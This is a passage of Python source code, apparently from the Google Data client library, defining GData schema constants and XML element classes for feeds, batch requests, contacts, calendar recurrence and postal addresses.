BATCH_TEMPLATE = '{http://schemas.google.com/gdata/batch}%s'

# Labels used in batch request entries to specify the desired CRUD operation.
BATCH_INSERT = 'insert'
BATCH_UPDATE = 'update'
BATCH_DELETE = 'delete'
BATCH_QUERY = 'query'

# Event location kinds and event status/visibility/transparency values.
EVENT_LOCATION = 'http://schemas.google.com/g/2005#event'
ALTERNATE_LOCATION = 'http://schemas.google.com/g/2005#event.alternate'
PARKING_LOCATION = 'http://schemas.google.com/g/2005#event.parking'
CANCELED_EVENT = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT = 'http://schemas.google.com/g/2005#event.tentative'
CONFIDENTIAL_EVENT = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT = 'http://schemas.google.com/g/2005#event.public'
OPAQUE_EVENT = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_EVENT = 'http://schemas.google.com/g/2005#event.transparent'

# Message kinds and recipient roles.
CHAT_MESSAGE = 'http://schemas.google.com/g/2005#message.chat'
INBOX_MESSAGE = 'http://schemas.google.com/g/2005#message.inbox'
SENT_MESSAGE = 'http://schemas.google.com/g/2005#message.sent'
SPAM_MESSAGE = 'http://schemas.google.com/g/2005#message.spam'
STARRED_MESSAGE = 'http://schemas.google.com/g/2005#message.starred'
UNREAD_MESSAGE = 'http://schemas.google.com/g/2005#message.unread'
BCC_RECIPIENT = 'http://schemas.google.com/g/2005#message.bcc'
CC_RECIPIENT = 'http://schemas.google.com/g/2005#message.cc'
SENDER = 'http://schemas.google.com/g/2005#message.from'
REPLY_TO = 'http://schemas.google.com/g/2005#message.reply-to'
TO_RECIPIENT = 'http://schemas.google.com/g/2005#message.to'

# rel values for contact phone numbers and related contact points.
ASSISTANT_REL = 'http://schemas.google.com/g/2005#assistant'
CALLBACK_REL = 'http://schemas.google.com/g/2005#callback'
CAR_REL = 'http://schemas.google.com/g/2005#car'
COMPANY_MAIN_REL = 'http://schemas.google.com/g/2005#company_main'
FAX_REL = 'http://schemas.google.com/g/2005#fax'
HOME_REL = 'http://schemas.google.com/g/2005#home'
HOME_FAX_REL = 'http://schemas.google.com/g/2005#home_fax'
ISDN_REL = 'http://schemas.google.com/g/2005#isdn'
MAIN_REL = 'http://schemas.google.com/g/2005#main'
MOBILE_REL = 'http://schemas.google.com/g/2005#mobile'
OTHER_REL = 'http://schemas.google.com/g/2005#other'
OTHER_FAX_REL = 'http://schemas.google.com/g/2005#other_fax'
PAGER_REL = 'http://schemas.google.com/g/2005#pager'
RADIO_REL = 'http://schemas.google.com/g/2005#radio'
TELEX_REL = 'http://schemas.google.com/g/2005#telex'
# NOTE(review): the name says TTL but the rel value is tty_tdd; the name is
# public API so it is kept as-is.
TTL_TDD_REL = 'http://schemas.google.com/g/2005#tty_tdd'
WORK_REL = 'http://schemas.google.com/g/2005#work'
WORK_FAX_REL = 'http://schemas.google.com/g/2005#work_fax'
WORK_MOBILE_REL = 'http://schemas.google.com/g/2005#work_mobile'
WORK_PAGER_REL = 'http://schemas.google.com/g/2005#work_pager'
NETMEETING_REL = 'http://schemas.google.com/g/2005#netmeeting'

# rel values for ratings.
OVERALL_REL = 'http://schemas.google.com/g/2005#overall'
PRICE_REL = 'http://schemas.google.com/g/2005#price'
QUALITY_REL = 'http://schemas.google.com/g/2005#quality'

# rel values for event-related links.
EVENT_REL = 'http://schemas.google.com/g/2005#event'
EVENT_ALTERNATE_REL = 'http://schemas.google.com/g/2005#event.alternate'
EVENT_PARKING_REL = 'http://schemas.google.com/g/2005#event.parking'

# Instant-messaging protocol identifiers.
AIM_PROTOCOL = 'http://schemas.google.com/g/2005#AIM'
MSN_PROTOCOL = 'http://schemas.google.com/g/2005#MSN'
YAHOO_MESSENGER_PROTOCOL = 'http://schemas.google.com/g/2005#YAHOO'
SKYPE_PROTOCOL = 'http://schemas.google.com/g/2005#SKYPE'
QQ_PROTOCOL = 'http://schemas.google.com/g/2005#QQ'
GOOGLE_TALK_PROTOCOL = 'http://schemas.google.com/g/2005#GOOGLE_TALK'
ICQ_PROTOCOL = 'http://schemas.google.com/g/2005#ICQ'
JABBER_PROTOCOL = 'http://schemas.google.com/g/2005#JABBER'

# Comment feed kinds.
REGULAR_COMMENTS = 'http://schemas.google.com/g/2005#regular'
REVIEW_COMMENTS = 'http://schemas.google.com/g/2005#reviews'

# Postal-mail handling and address usage values.
MAIL_BOTH = 'http://schemas.google.com/g/2005#both'
MAIL_LETTERS = 'http://schemas.google.com/g/2005#letters'
MAIL_PARCELS = 'http://schemas.google.com/g/2005#parcels'
MAIL_NEITHER = 'http://schemas.google.com/g/2005#neither'
GENERAL_ADDRESS = 'http://schemas.google.com/g/2005#general'
LOCAL_ADDRESS = 'http://schemas.google.com/g/2005#local'

# Event attendee types and statuses.
# NOTE(review): 'ATENDEE' (single T) is the established public spelling.
OPTIONAL_ATENDEE = 'http://schemas.google.com/g/2005#event.optional'
REQUIRED_ATENDEE = 'http://schemas.google.com/g/2005#event.required'
ATTENDEE_ACCEPTED = 'http://schemas.google.com/g/2005#event.accepted'
ATTENDEE_DECLINED = 'http://schemas.google.com/g/2005#event.declined'
ATTENDEE_INVITED = 'http://schemas.google.com/g/2005#event.invited'
ATTENDEE_TENTATIVE = 'http://schemas.google.com/g/2005#event.tentative'

# Feed projection and visibility values.
FULL_PROJECTION = 'full'
VALUES_PROJECTION = 'values'
BASIC_PROJECTION = 'basic'
PRIVATE_VISIBILITY = 'private'
PUBLIC_VISIBILITY = 'public'

# Event transparency, visibility and status values.
OPAQUE_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.transparent'
CONFIDENTIAL_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.public'
CANCELED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.tentative'

# rel for a feed's access control list.
ACL_REL = 'http://schemas.google.com/acl/2007#accessControlList'
class Error(Exception):
  """Base exception for errors raised by this module."""
class MissingRequiredParameters(Error):
  """Raised when a call omits parameters that it cannot proceed without."""
class LinkFinder(atom.data.LinkFinder):
  """Mixin used in Feed and Entry classes to simplify link lookups by type.

  Supplies convenience accessors for the HTML, POST, ACL, feed and paging
  links that are shared across the Google Data APIs.
  """

  def find_html_link(self):
    """Finds the first link with rel of alternate and type of text/html."""
    found = self.get_html_link()
    if found is None:
      return None
    return found.href

  FindHtmlLink = find_html_link

  def get_html_link(self):
    """Returns the first link element with rel 'alternate', type 'text/html'."""
    return next(
        (candidate for candidate in self.link
         if candidate.rel == 'alternate' and candidate.type == 'text/html'),
        None)

  GetHtmlLink = get_html_link

  def find_post_link(self):
    """Get the URL to which new entries should be POSTed.

    The POST target URL is used to insert new entries.

    Returns:
      A str for the URL in the link with a rel matching the POST type.
    """
    return self.find_url('http://schemas.google.com/g/2005#post')

  FindPostLink = find_post_link

  def get_post_link(self):
    """Returns the link element whose rel matches the POST type."""
    return self.get_link('http://schemas.google.com/g/2005#post')

  GetPostLink = get_post_link

  def find_acl_link(self):
    """Returns the href of the ACL link (or ACL feed_link), or None."""
    acl = self.get_acl_link()
    return acl.href if acl else None

  FindAclLink = find_acl_link

  def get_acl_link(self):
    """Searches for a link or feed_link (if present) with the rel for ACL."""
    direct = self.get_link(ACL_REL)
    if direct:
      return direct
    # Some entry types expose the ACL feed via a nested gd:feedLink instead.
    if hasattr(self, 'feed_link'):
      for nested in self.feed_link:
        if nested.rel == ACL_REL:
          return nested
    return None

  GetAclLink = get_acl_link

  def find_feed_link(self):
    """Returns the URL of the related-feed link."""
    return self.find_url('http://schemas.google.com/g/2005#feed')

  FindFeedLink = find_feed_link

  def get_feed_link(self):
    """Returns the link element whose rel matches the feed type."""
    return self.get_link('http://schemas.google.com/g/2005#feed')

  GetFeedLink = get_feed_link

  def find_previous_link(self):
    """Returns the URL of the 'previous' paging link."""
    return self.find_url('previous')

  FindPreviousLink = find_previous_link

  def get_previous_link(self):
    """Returns the 'previous' paging link element."""
    return self.get_link('previous')

  GetPreviousLink = get_previous_link
class TotalResults(atom.core.XmlElement):
  """opensearch:TotalResults for a GData feed."""
  # Two candidate qnames: the element appears under both the OpenSearch
  # 1.0 and 1.1 namespaces depending on the service.
  _qname = (OPENSEARCH_TEMPLATE_V1 % 'totalResults',
            OPENSEARCH_TEMPLATE_V2 % 'totalResults')
class StartIndex(atom.core.XmlElement):
  """The opensearch:startIndex element in GData feed."""
  # Same dual-namespace handling as TotalResults.
  _qname = (OPENSEARCH_TEMPLATE_V1 % 'startIndex',
            OPENSEARCH_TEMPLATE_V2 % 'startIndex')
class ItemsPerPage(atom.core.XmlElement):
  """The opensearch:itemsPerPage element in GData feed."""
  # Same dual-namespace handling as TotalResults.
  _qname = (OPENSEARCH_TEMPLATE_V1 % 'itemsPerPage',
            OPENSEARCH_TEMPLATE_V2 % 'itemsPerPage')
class ExtendedProperty(atom.core.XmlElement):
  """The Google Data extendedProperty element.

  Stores arbitrary key-value information specific to your application.
  The value is either a text string held in an XML attribute (.value)
  or an XML node (XmlBlob) kept as the single child element.  This
  element is used in the Google Calendar data API and the Google
  Contacts data API.
  """
  _qname = GDATA_TEMPLATE % 'extendedProperty'
  # XML attributes holding the property key and its string value.
  name = 'name'
  value = 'value'

  def get_xml_blob(self):
    """Returns the XML blob as an atom.core.XmlElement, or None if unset."""
    # When present, the blob is the only child element.
    return self._other_elements[0] if self._other_elements else None

  GetXmlBlob = get_xml_blob

  def set_xml_blob(self, blob):
    """Stores blob as the single XML child of this extendedProperty.

    The extendedProperty is only allowed one child element as an XML
    blob, so any preexisting member elements are discarded.

    Args:
      blob: str or atom.core.XmlElement representing the XML blob stored
          in the extendedProperty.
    """
    if isinstance(blob, atom.core.XmlElement):
      replacement = blob
    else:
      replacement = atom.core.parse(str(blob))
    # Replacing the list wholesale clears previous child nodes.
    self._other_elements = [replacement]

  SetXmlBlob = set_xml_blob
class GDEntry(atom.data.Entry, LinkFinder):
  """Extends Atom Entry to provide data processing"""
  # The etag attribute lives in the gd namespace.
  etag = '{http://schemas.google.com/g/2005}etag'

  def get_id(self):
    """Returns the entry's atom id text, stripped, or None when unset."""
    if self.id is None or self.id.text is None:
      return None
    return self.id.text.strip()

  GetId = get_id

  def is_media(self):
    """Returns True when the entry carries an edit-media link."""
    return bool(self.find_edit_media_link())

  IsMedia = is_media

  def find_media_link(self):
    """Returns the URL to the media content for media entries, else None."""
    return self.content.src if self.is_media() else None

  FindMediaLink = find_media_link
class GDFeed(atom.data.Feed, LinkFinder):
  """A Feed from a GData service."""
  # The etag attribute lives in the gd namespace.
  etag = '{http://schemas.google.com/g/2005}etag'
  # OpenSearch paging metadata and the entry collection.
  total_results = TotalResults
  start_index = StartIndex
  items_per_page = ItemsPerPage
  entry = [GDEntry]

  def get_id(self):
    """Returns the feed's atom id text, stripped, or None when unset."""
    if self.id is None or self.id.text is None:
      return None
    return self.id.text.strip()

  GetId = get_id

  def get_generator(self):
    """Returns the stripped generator text, or None when absent or empty."""
    has_text = self.generator and self.generator.text
    return self.generator.text.strip() if has_text else None
class BatchId(atom.core.XmlElement):
  """Identifies a single operation in a batch request.

  The server echoes this id in the response feed so results can be
  matched back to the entry that produced them.
  """
  _qname = BATCH_TEMPLATE % 'id'
class BatchOperation(atom.core.XmlElement):
  """The CRUD operation which this batch entry represents."""
  _qname = BATCH_TEMPLATE % 'operation'
  # XML attribute naming the operation: 'insert', 'update', 'delete' or
  # 'query' (see BatchFeed.add_batch_entry).
  type = 'type'
class BatchStatus(atom.core.XmlElement):
  """The batch:status element present in a batch response entry.

  A status element contains the code (HTTP response code) and
  reason as elements. In a single request these fields would
  be part of the HTTP response, but in a batch request each
  Entry operation has a corresponding Entry in the response
  feed which includes status information.

  See http://code.google.com/apis/gdata/batch.html#Handling_Errors
  """
  _qname = BATCH_TEMPLATE % 'status'
  # HTTP-style numeric status code for this entry's operation.
  code = 'code'
  # Human-readable explanation accompanying the code.
  reason = 'reason'
  content_type = 'content-type'
class BatchEntry(GDEntry):
  """An atom:entry for use in batch requests.

  The BatchEntry contains additional members to specify the operation to be
  performed on this entry and a batch ID so that the server can reference
  individual operations in the response feed. For more information, see:
  http://code.google.com/apis/gdata/batch.html
  """
  # Which CRUD operation to apply (batch:operation child element).
  batch_operation = BatchOperation
  # Caller-chosen id echoed back by the server (batch:id child element).
  batch_id = BatchId
  # Per-entry result status; populated only in response feeds.
  batch_status = BatchStatus
class BatchInterrupted(atom.core.XmlElement):
  """The batch:interrupted element sent if batch request was interrupted.

  Only appears in a feed if some of the batch entries could not be processed.
  See: http://code.google.com/apis/gdata/batch.html#Handling_Errors
  """
  _qname = BATCH_TEMPLATE % 'interrupted'
  # Explanation of why processing stopped.
  reason = 'reason'
  # NOTE(review): success/failures/parsed presumably carry entry counts
  # per the batch protocol doc above -- confirm against the wire format.
  success = 'success'
  failures = 'failures'
  parsed = 'parsed'
class BatchFeed(GDFeed):
  """A feed containing a list of batch request entries."""
  # Present in a response feed only when processing was cut short.
  interrupted = BatchInterrupted
  entry = [BatchEntry]
  def add_batch_entry(self, entry=None, id_url_string=None,
                      batch_id_string=None, operation_string=None):
    """Logic for populating members of a BatchEntry and adding to the feed.

    NOTE(review): despite earlier documentation claiming non-BatchEntry
    input is converted, the entry is used as-is here; pass a BatchEntry
    (or just an id_url_string) so the batch-specific members exist.

    The id_url_string can be used in place of an entry if the batch operation
    applies to a URL. For example query and delete operations require just
    the URL of an entry, no body is sent in the HTTP request. If an
    id_url_string is sent instead of an entry, a BatchEntry is created and
    added to the feed.

    This method also assigns the desired batch id to the entry so that it
    can be referenced in the server's response. If the batch_id_string is
    None, this method will assign a batch_id to be the index at which this
    entry will be in the feed's entry list.

    Args:
      entry: BatchEntry, atom.data.Entry, or another Entry flavor (optional)
          The entry which will be sent to the server as part of the batch
          request. The item must have a valid atom id so that the server
          knows which entry this request references.
      id_url_string: str (optional) The URL of the entry to be acted on. You
          can find this URL in the text member of the atom id for an entry.
          If an entry is not sent, this id will be used to construct a new
          BatchEntry which will be added to the request feed.
      batch_id_string: str (optional) The batch ID to be used to reference
          this batch operation in the results feed. If this parameter is None,
          the current length of the feed's entry array will be used as a
          count. Note that batch_ids should either always be specified or
          never, mixing could potentially result in duplicate batch ids.
      operation_string: str (optional) The desired batch operation which will
          set the batch_operation.type member of the entry. Options are
          'insert', 'update', 'delete', and 'query'

    Raises:
      MissingRequiredParameters: Raised if neither an id_url_string nor an
          entry are provided in the request.

    Returns:
      The added entry.
    """
    if entry is None and id_url_string is None:
      raise MissingRequiredParameters('supply either an entry or URL string')
    if entry is None and id_url_string is not None:
      # Wrap the bare URL in a minimal BatchEntry carrying only an atom id.
      entry = BatchEntry(id=atom.data.Id(text=id_url_string))
    if batch_id_string is not None:
      entry.batch_id = BatchId(text=batch_id_string)
    elif entry.batch_id is None or entry.batch_id.text is None:
      # Default batch id: the entry's position in the feed at append time.
      entry.batch_id = BatchId(text=str(len(self.entry)))
    if operation_string is not None:
      entry.batch_operation = BatchOperation(type=operation_string)
    self.entry.append(entry)
    return entry
  AddBatchEntry = add_batch_entry
  def add_insert(self, entry, batch_id_string=None):
    """Add an insert request to the operations in this batch request feed.

    If the entry doesn't yet have an operation or a batch id, these will
    be set to the insert operation and a batch_id specified as a parameter.

    Args:
      entry: BatchEntry The entry which will be sent in the batch feed as an
          insert request.
      batch_id_string: str (optional) The batch ID to be used to reference
          this batch operation in the results feed. If this parameter is None,
          the current length of the feed's entry array will be used as a
          count. Note that batch_ids should either always be specified or
          never, mixing could potentially result in duplicate batch ids.
    """
    self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
                         operation_string=BATCH_INSERT)
  AddInsert = add_insert
  def add_update(self, entry, batch_id_string=None):
    """Add an update request to the list of batch operations in this feed.

    Sets the operation type of the entry to update if it is not already set
    and assigns the desired batch id to the entry so that it can be
    referenced in the server's response.

    Args:
      entry: BatchEntry The entry which will be sent to the server as an
          update (HTTP PUT) request. The item must have a valid atom id
          so that the server knows which entry to replace.
      batch_id_string: str (optional) The batch ID to be used to reference
          this batch operation in the results feed. If this parameter is None,
          the current length of the feed's entry array will be used as a
          count. See also comments for AddInsert.
    """
    self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
                         operation_string=BATCH_UPDATE)
  AddUpdate = add_update
  def add_delete(self, url_string=None, entry=None, batch_id_string=None):
    """Adds a delete request to the batch request feed.

    This method takes either the url_string which is the atom id of the item
    to be deleted, or the entry itself. The atom id of the entry must be
    present so that the server knows which entry should be deleted.

    Args:
      url_string: str (optional) The URL of the entry to be deleted. You can
          find this URL in the text member of the atom id for an entry.
      entry: BatchEntry (optional) The entry to be deleted.
      batch_id_string: str (optional)

    Raises:
      MissingRequiredParameters: Raised if neither a url_string nor an entry
          are provided in the request.
    """
    self.add_batch_entry(entry=entry, id_url_string=url_string,
                         batch_id_string=batch_id_string, operation_string=BATCH_DELETE)
  AddDelete = add_delete
  def add_query(self, url_string=None, entry=None, batch_id_string=None):
    """Adds a query request to the batch request feed.

    This method takes either the url_string which is the query URL
    whose results will be added to the result feed. The query URL will
    be encapsulated in a BatchEntry, and you may pass in the BatchEntry
    with a query URL instead of sending a url_string.

    Args:
      url_string: str (optional)
      entry: BatchEntry (optional)
      batch_id_string: str (optional)

    Raises:
      MissingRequiredParameters
    """
    self.add_batch_entry(entry=entry, id_url_string=url_string,
                         batch_id_string=batch_id_string, operation_string=BATCH_QUERY)
  AddQuery = add_query
  def find_batch_link(self):
    """Returns the URL to which this batch feed should be POSTed."""
    return self.find_url('http://schemas.google.com/g/2005#batch')
  FindBatchLink = find_batch_link
class EntryLink(atom.core.XmlElement):
  """The gd:entryLink element.

  Represents a logically nested entry. For example, a <gd:who>
  representing a contact might have a nested entry from a contact feed.
  """
  _qname = GDATA_TEMPLATE % 'entryLink'
  # Inline nested entry, when embedded rather than linked.
  entry = GDEntry
  rel = 'rel'
  # Maps to the readOnly XML attribute.
  read_only = 'readOnly'
  href = 'href'
class FeedLink(atom.core.XmlElement):
  """The gd:feedLink element.

  Represents a logically nested feed. For example, a calendar feed might
  have a nested feed representing all comments on entries.
  """
  _qname = GDATA_TEMPLATE % 'feedLink'
  # Inline nested feed, when embedded rather than linked.
  feed = GDFeed
  rel = 'rel'
  # Maps to the readOnly XML attribute.
  read_only = 'readOnly'
  # Maps to the countHint XML attribute.
  count_hint = 'countHint'
  href = 'href'
class AdditionalName(atom.core.XmlElement):
  """The gd:additionalName element.

  Specifies additional (eg. middle) name of the person.
  Contains an attribute for the phonetic representation of the name.
  """
  _qname = GDATA_TEMPLATE % 'additionalName'
  # Phonetic (Yomigana) reading of the name.
  yomi = 'yomi'
class Comments(atom.core.XmlElement):
  """The gd:comments element.

  Contains a comments feed for the enclosing entry (such as a calendar event).
  """
  _qname = GDATA_TEMPLATE % 'comments'
  rel = 'rel'
  # Link to (or inline copy of) the comments feed.
  feed_link = FeedLink
class Country(atom.core.XmlElement):
  """The gd:country element.

  Country name along with optional country code. The country code is
  given in accordance with ISO 3166-1 alpha-2:
  http://www.iso.org/iso/iso-3166-1_decoding_table
  """
  _qname = GDATA_TEMPLATE % 'country'
  # ISO 3166-1 alpha-2 country code attribute.
  code = 'code'
class EmailImParent(atom.core.XmlElement):
  """Attributes shared by the gd:email and gd:im elements (base class)."""
  address = 'address'
  label = 'label'
  rel = 'rel'
  primary = 'primary'
class Email(EmailImParent):
  """The gd:email element.

  An email address associated with the containing entity (which is
  usually an entity representing a person or a location).
  """
  _qname = GDATA_TEMPLATE % 'email'
  # Maps to the displayName XML attribute.
  display_name = 'displayName'
class FamilyName(atom.core.XmlElement):
  """The gd:familyName element.

  Specifies family name of the person, eg. "Smith".
  """
  _qname = GDATA_TEMPLATE % 'familyName'
  # Phonetic (Yomigana) reading of the name.
  yomi = 'yomi'
class Im(EmailImParent):
  """The gd:im element.

  An instant messaging address associated with the containing entity.
  """
  _qname = GDATA_TEMPLATE % 'im'
  # IM protocol rel value (see the *_PROTOCOL constants above).
  protocol = 'protocol'
class GivenName(atom.core.XmlElement):
  """The gd:givenName element.

  Specifies given name of the person, eg. "John".
  """
  _qname = GDATA_TEMPLATE % 'givenName'
  # Phonetic (Yomigana) reading of the name.
  yomi = 'yomi'
class NamePrefix(atom.core.XmlElement):
  """The gd:namePrefix element.

  Honorific prefix, eg. 'Mr' or 'Mrs'.
  """
  _qname = GDATA_TEMPLATE % 'namePrefix'
class NameSuffix(atom.core.XmlElement):
  """The gd:nameSuffix element.

  Honorific suffix, eg. 'san' or 'III'.
  """
  _qname = GDATA_TEMPLATE % 'nameSuffix'
class FullName(atom.core.XmlElement):
  """The gd:fullName element.

  Unstructured representation of the name.
  """
  _qname = GDATA_TEMPLATE % 'fullName'
class Name(atom.core.XmlElement):
  """The gd:name element.

  Allows storing person's name in a structured way. Consists of
  given name, additional name, family name, prefix, suffix and full name.
  """
  _qname = GDATA_TEMPLATE % 'name'
  given_name = GivenName
  additional_name = AdditionalName
  family_name = FamilyName
  name_prefix = NamePrefix
  name_suffix = NameSuffix
  full_name = FullName
class OrgDepartment(atom.core.XmlElement):
  """The gd:orgDepartment element.

  Describes a department within an organization. Must appear within a
  gd:organization element.
  """
  _qname = GDATA_TEMPLATE % 'orgDepartment'
class OrgJobDescription(atom.core.XmlElement):
  """The gd:orgJobDescription element.

  Describes a job within an organization. Must appear within a
  gd:organization element.
  """
  _qname = GDATA_TEMPLATE % 'orgJobDescription'
class OrgName(atom.core.XmlElement):
  """The gd:orgName element.

  The name of the organization. Must appear within a gd:organization
  element.

  Contains a Yomigana attribute (Japanese reading aid) for the
  organization name.
  """
  _qname = GDATA_TEMPLATE % 'orgName'
  # Phonetic (Yomigana) reading of the organization name.
  yomi = 'yomi'
class OrgSymbol(atom.core.XmlElement):
  """The gd:orgSymbol element.

  Provides a symbol of an organization. Must appear within a
  gd:organization element.
  """
  _qname = GDATA_TEMPLATE % 'orgSymbol'
class OrgTitle(atom.core.XmlElement):
  """The gd:orgTitle element.

  The title of a person within an organization. Must appear within a
  gd:organization element.
  """
  _qname = GDATA_TEMPLATE % 'orgTitle'
class Organization(atom.core.XmlElement):
  """The gd:organization element.

  An organization, typically associated with a contact.
  """
  _qname = GDATA_TEMPLATE % 'organization'
  label = 'label'
  primary = 'primary'
  rel = 'rel'
  # Nested child elements describing the organization.
  department = OrgDepartment
  job_description = OrgJobDescription
  name = OrgName
  symbol = OrgSymbol
  title = OrgTitle
class When(atom.core.XmlElement):
  """The gd:when element.

  Represents a period of time or an instant.
  """
  _qname = GDATA_TEMPLATE % 'when'
  # Python names differ from the XML attribute names on the right.
  end = 'endTime'
  start = 'startTime'
  value = 'valueString'
class OriginalEvent(atom.core.XmlElement):
  """The gd:originalEvent element.

  Equivalent to the Recurrence ID property specified in section 4.8.4.4
  of RFC 2445. Appears in every instance of a recurring event, to identify
  the original event.

  Contains a <gd:when> element specifying the original start time of the
  instance that has become an exception.
  """
  _qname = GDATA_TEMPLATE % 'originalEvent'
  id = 'id'
  href = 'href'
  # Original start time of the exceptional instance.
  when = When
class PhoneNumber(atom.core.XmlElement):
  """The gd:phoneNumber element.

  A phone number associated with the containing entity (which is usually
  an entity representing a person or a location).
  """
  _qname = GDATA_TEMPLATE % 'phoneNumber'
  label = 'label'
  rel = 'rel'
  uri = 'uri'
  primary = 'primary'
class PostalAddress(atom.core.XmlElement):
  """The gd:postalAddress element."""
  _qname = GDATA_TEMPLATE % 'postalAddress'
  label = 'label'
  rel = 'rel'
  uri = 'uri'
  primary = 'primary'
class Rating(atom.core.XmlElement):
  """The gd:rating element.

  Represents a numeric rating of the enclosing entity, such as a
  comment. Each rating supplies its own scale, although it may be
  normalized by a service; for example, some services might convert all
  ratings to a scale from 1 to 5.
  """
  _qname = GDATA_TEMPLATE % 'rating'
  average = 'average'
  max = 'max'
  min = 'min'
  # Maps to the numRaters XML attribute.
  num_raters = 'numRaters'
  rel = 'rel'
  value = 'value'
class Recurrence(atom.core.XmlElement):
  """The gd:recurrence element.

  Represents the dates and times when a recurring event takes place.

  The string that defines the recurrence consists of a set of properties,
  each of which is defined in the iCalendar standard (RFC 2445).
  Specifically, the string usually begins with a DTSTART property that
  indicates the starting time of the first instance of the event, and
  often a DTEND property or a DURATION property to indicate when the
  first instance ends. Next come RRULE, RDATE, EXRULE, and/or EXDATE
  properties, which collectively define a recurring event and its
  exceptions (but see below). (See section 4.8.5 of RFC 2445 for more
  information about these recurrence component properties.) Last comes a
  VTIMEZONE component, providing detailed timezone rules for any timezone
  ID mentioned in the preceding properties.

  Google services like Google Calendar don't generally generate EXRULE
  and EXDATE properties to represent exceptions to recurring events;
  instead, they generate <gd:recurrenceException> elements. However,
  Google services may include EXRULE and/or EXDATE properties anyway;
  for example, users can import events and exceptions into Calendar, and
  if those imported events contain EXRULE or EXDATE properties, then
  Calendar will provide those properties when it sends a <gd:recurrence>
  element.

  Note that the use of <gd:recurrenceException> means that you can't be
  sure just from examining a <gd:recurrence> element whether there are
  any exceptions to the recurrence description. To ensure that you find
  all exceptions, look for <gd:recurrenceException> elements in the feed,
  and use their <gd:originalEvent> elements to match them up with
  <gd:recurrence> elements.
  """
  _qname = GDATA_TEMPLATE % 'recurrence'
class RecurrenceException(atom.core.XmlElement):
  """The gd:recurrenceException element.

  Represents an event that's an exception to a recurring event - that is,
  an instance of a recurring event in which one or more aspects of the
  recurring event (such as attendance list, time, or location) have been
  changed.

  Contains a <gd:originalEvent> element that specifies the original
  recurring event that this event is an exception to.

  When you change an instance of a recurring event, that instance becomes
  an exception. Depending on what change you made to it, the exception
  behaves in either of two different ways when the original recurring
  event is changed:

  - If you add, change, or remove comments, attendees, or attendee
    responses, then the exception remains tied to the original event, and
    changes to the original event also change the exception.
  - If you make any other changes to the exception (such as changing the
    time or location) then the instance becomes "specialized," which means
    that it's no longer as tightly tied to the original event. If you
    change the original event, specialized exceptions don't change. But
    see below.

  For example, say you have a meeting every Tuesday and Thursday at
  2:00 p.m. If you change the attendance list for this Thursday's meeting
  (but not for the regularly scheduled meeting), then it becomes an
  exception. If you change the time for this Thursday's meeting (but not
  for the regularly scheduled meeting), then it becomes specialized.

  Regardless of whether an exception is specialized or not, if you do
  something that deletes the instance that the exception was derived from,
  then the exception is deleted. Note that changing the day or time of a
  recurring event deletes all instances, and creates new ones.

  For example, after you've specialized this Thursday's meeting, say you
  change the recurring meeting to happen on Monday, Wednesday, and Friday.
  That change deletes all of the recurring instances of the
  Tuesday/Thursday meeting, including the specialized one.

  If a particular instance of a recurring event is deleted, then that
  instance appears as a <gd:recurrenceException> containing a
  <gd:entryLink> that has its <gd:eventStatus> set to
  "http://schemas.google.com/g/2005#event.canceled". (For more
  information about canceled events, see RFC 2445.)
  """
  _qname = GDATA_TEMPLATE % 'recurrenceException'
  # 'true' when this exception has diverged from the original event.
  specialized = 'specialized'
  # Nested entry describing the exceptional instance.
  entry_link = EntryLink
  # Identifies which recurring event this is an exception to.
  original_event = OriginalEvent
class Reminder(atom.core.XmlElement):
  """The gd:reminder element.

  A time interval, indicating how long before the containing entity's start
  time or due time attribute a reminder should be issued. Alternatively,
  may specify an absolute time at which a reminder should be issued. Also
  specifies a notification method, indicating what medium the system
  should use to remind the user.
  """
  _qname = GDATA_TEMPLATE % 'reminder'
  # Absolute trigger time (maps to the absoluteTime XML attribute);
  # mutually exclusive in intent with the relative days/hours/minutes.
  absolute_time = 'absoluteTime'
  # Notification medium (e.g. email, sms, popup per the gd schema docs).
  method = 'method'
  days = 'days'
  hours = 'hours'
  minutes = 'minutes'
class Transparency(atom.core.XmlElement):
  """The gd:transparency element:

  Extensible enum corresponding to the TRANSP property defined in RFC 2445.
  """
  _qname = GDATA_TEMPLATE % 'transparency'
  value = 'value'
class Agent(atom.core.XmlElement):
  """The gd:agent element.

  The agent who actually receives the mail. Used in work addresses.
  Also for 'in care of' or 'c/o'.
  """
  _qname = GDATA_TEMPLATE % 'agent'
class HouseName(atom.core.XmlElement):
  """The gd:housename element.

  Used in places where houses or buildings have names (and not
  necessarily numbers), eg. "The Pillars".
  """
  _qname = GDATA_TEMPLATE % 'housename'
class Street(atom.core.XmlElement):
  """The gd:street element.

  Can be street, avenue, road, etc. This element also includes the
  house number and room/apartment/flat/floor number.
  """
  _qname = GDATA_TEMPLATE % 'street'
class PoBox(atom.core.XmlElement):
  """The gd:pobox element.

  Covers actual P.O. boxes, drawers, locked bags, etc. This is usually
  but not always mutually exclusive with street.
  """
  _qname = GDATA_TEMPLATE % 'pobox'
class Neighborhood(atom.core.XmlElement):
  """The gd:neighborhood element.

  This is used to disambiguate a street address when a city contains more
  than one street with the same name, or to specify a small place whose
  mail is routed through a larger postal town. In China it could be a
  county or a minor city.
  """
  _qname = GDATA_TEMPLATE % 'neighborhood'
class City(atom.core.XmlElement):
  """The gd:city element.

  Can be city, village, town, borough, etc. This is the postal town and
  not necessarily the place of residence or place of business.
  """
  _qname = GDATA_TEMPLATE % 'city'
class Subregion(atom.core.XmlElement):
  """The gd:subregion element.

